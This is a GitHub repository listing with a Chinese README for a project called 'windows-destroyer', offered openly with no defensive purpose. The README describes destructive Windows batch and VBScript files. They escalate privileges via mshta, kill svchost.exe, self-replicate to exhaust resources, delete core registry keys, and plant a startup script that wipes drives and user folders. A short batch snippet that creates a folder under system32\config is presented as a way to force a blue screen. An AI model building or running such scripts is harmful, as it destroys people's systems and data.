https://github.com/jarocheng0123/windows-destroyer
权限提升、自我复制、强制结束系统进程
https://github.com/jarocheng0123/windows-destroyer
bat microsoft-defender vbs windows
Last synced: 10 months ago
JSON representation
权限提升、自我复制、强制结束系统进程
- Host: GitHub
- URL: https://github.com/jarocheng0123/windows-destroyer
- Owner: jarocheng0123
- Created: 2025-03-31T05:50:33.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2025-08-25T03:09:15.000Z (10 months ago)
- Last Synced: 2025-08-25T04:45:04.897Z (10 months ago)
- Topics: bat, microsoft-defender, vbs, windows
- Language: VBScript
- Homepage:
- Size: 10.7 KB
- Stars: 3
- Watchers: 1
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
### 死机蓝屏:`system_crash.bat`
1. **权限提升**:利用 `mshta` 和 VBScript 以管理员身份重新运行脚本。
2. **进程破坏**:创建并执行 PowerShell 脚本,强制结束 `svchost.exe` 进程,导致系统不稳定。
3. **资源耗尽**:通过自我复制和无限循环,耗尽系统资源。
### 开机自启文件夹:`open_startup.vbs`
```batch
获取当前用户的启动文件夹路径并打开该文件夹,可能用于后续恶意脚本的植入。
```
### 删除注册表:`registry_delete.bat`
1. **权限提升**:以管理员身份重新运行脚本。
2. **注册表破坏**:强制删除注册表中 `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion` 下的所有项,破坏系统配置。
### 删除指定磁盘文件:`data_deletion.vbs`
1. **持久化**:在当前用户的启动文件夹创建一个新的 VBScript 脚本。
2. **数据删除**:新脚本会在系统启动时等待一段时间后,删除指定磁盘分区和用户目录下的所有文件和文件夹,并最终删除自身。
## 蓝屏.bat
```
@echo off
mkdir "C:\Windows\system32\config\OSDATA"
```
### 第2代脚本在测试过程中遇到的问题,可能在部分情况下无法运行